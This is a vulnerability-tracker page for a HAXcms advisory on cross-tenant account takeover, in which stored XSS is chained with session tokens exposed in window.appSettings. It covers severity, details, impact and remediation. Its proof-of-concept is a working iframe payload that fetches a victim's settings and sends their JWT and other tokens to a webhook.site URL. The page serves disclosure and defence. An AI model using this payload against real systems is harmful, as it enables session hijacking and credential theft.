Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionGitHub Advisory
Summary
An attack chain utilizing Stored XSS alongside dynamic token exposure in the /system/api/connectionSettings endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the jwt, user_token, site_token, and appstore_token) into a global JavaScript variable (window.appSettings). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook.
Details
In Operations.php (connectionSettings()), the system returns a Javascript object designed to bootstrap the frontend context. This object, window.appSettings, acts as a "skeleton key" because it aggregates all necessary operational tokens for the active session.
While HAXcms correctly relies on the cryptographically signed JWT for backend authentication (preventing Direct Object Reference/IDOR attempts), the CMS fails to secure the tokens themselves. Specifically:
- The Vector: The system is vulnerable to Stored XSS (e.g., via injected
iframesrcdocor<video-player>). - The Exposure: Because the
connectionSettingsendpoint serves the tokens locally based on the activePHPSESSIDcookie, any malicious script running in the browser context can intercept these keys. - The Chain: HAXcms isolates user environments by URL path (
/<username>/). An attacker can use XSS to force the victim's browser to fetch their *target* username's specific settings viafetch('/<username>/system/api/connectionSettings'). Since the browser implicitly attaches the victim's session cookie, the server authenticates the request and returns the victim's valid JWT and tokens.
PoC
1. Setup the Webhook Target Prepare an external webhook (e.g., webhook.site) to receive the stolen data.
2. Inject the "Kill Chain" Payload As an authenticated attacker (e.g., having edit access to any site), inject the following Javascript via the verified Stored XSS vectors (such as checking the HTML Source of a page and writing an <iframe>):
<iframe srcdoc="<script>
const targetUsername = 'bto108'; // Replace with target victim
fetch(`/${targetUsername}/system/api/connectionSettings`)
.then(res => res.text())
.then(data => {
const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));
const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');
const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');
let aToken = 'N/A';
if (s.appStore && s.appStore.params && s.appStore.params.appstore_token) {
aToken = s.appStore.params.appstore_token;
}
// Exfiltrate via Image Request to bypass CORS
const payload = btoa(JSON.stringify({
target: targetUsername,
jwt: s.jwt,
user_token: uToken,
site_token: sToken,
appstore_token: aToken
}));
new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;
});
</script>" style="display:none"></iframe>3. Execution & Verification
- When the victim (e.g., user
bto108) views the compromised page, their browser automatically fires thefetchrequest, silently attaching their active session cookie. - The server responds with their connection settings.
- The script parses their
jwt,user_token, and other keys, encoding them in base64. - The attacker receives the full JWT and token dump on their webhook.
*Screenshots confirming the data leakage and webhook capture:* !Connection Settings Exposure !Secondary Settings Leak !Cross-tenant Exfiltration Console !Webhook Payload Capture !Stolen Data Result
Impact
Critical Severity. This attack completely compromises the primary defense mechanism of the CMS. By stealing the jwt and user_token, the attacker achieves total account hijacking without needing the victim's password. They can emulate the victim perfectly, bypassing standard interface restrictions to perform malicious administrative actions (creating/deleting sites, modifying user access, or uploading malicious content).
The reliance on a global Javascript variable (window.appSettings) to store long-lived administrative security tokens creates a devastating chokepoint when combined with XSS.
AnalysisAI
Cross-tenant account takeover in HAXcms (npm package @haxtheweb/haxcms-nodejs <= 25.0.0) allows an authenticated attacker with edit access to chain a stored XSS flaw with token leakage in the /system/api/connectionSettings endpoint to hijack other tenants' sessions. The endpoint exposes the victim's JWT, user_token, site_token, and appstore_token via the window.appSettings global, letting injected JavaScript silently exfiltrate them to an attacker-controlled webhook and fully impersonate the victim. A detailed reporter-supplied PoC exists in the GitHub Security Advisory, though there is no public exploit identified at time of analysis as a packaged weapon and no CISA KEV entry.
Technical ContextAI
HAXcms is a PHP/Node.js headless CMS (npm package @haxtheweb/haxcms-nodejs) that isolates tenants by URL path (/<username>/) and uses cryptographically signed JWTs plus per-feature tokens (user_token, site_token, appstore_token) for backend authentication. The flaw stems from CWE-79 (Improper Neutralization of Input During Web Page Generation) - Operations.php's connectionSettings() method bootstraps the frontend by writing all active-session tokens into a global window.appSettings JavaScript variable, while stored XSS sinks (e.g., iframe srcdoc and the <video-player> element) allow arbitrary script execution in the authenticated origin. Because authorization on /system/api/connectionSettings is bound to the PHPSESSID cookie rather than to the URL-path tenant, a malicious fetch under /<victim>/system/api/connectionSettings issued from the victim's browser is honored and returns the victim's tokens - collapsing the tenant isolation boundary into a single XSS-reachable chokepoint.
RemediationAI
Vendor-released patch: upgrade @haxtheweb/haxcms-nodejs to 26.0.0 or later as published in GHSA-x3x5-7h4h-gwxg (https://github.com/haxtheweb/issues/security/advisories/GHSA-x3x5-7h4h-gwxg), which is the only confirmed fix. Where immediate upgrade is not possible, compensating controls include tightening the trust model around edit accounts (require manual approval for new editor-tier users to shrink the pool of potential XSS injectors), restricting access to the /system/api/connectionSettings endpoint at a reverse proxy by enforcing that the URL-path tenant matches the authenticated session's username (this will break legitimate cross-site editing workflows for users who manage multiple tenants), and adding a strict Content-Security-Policy with script-src 'self' plus disallowed inline scripts and iframe srcdoc to neutralize the documented XSS sinks (note this may break HAXcms web components and admin UI features that rely on inline scripts and must be tested before deployment). Rotating all JWT signing keys and per-user tokens after patching is recommended in case prior exploitation occurred.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-34890
GHSA-x3x5-7h4h-gwxg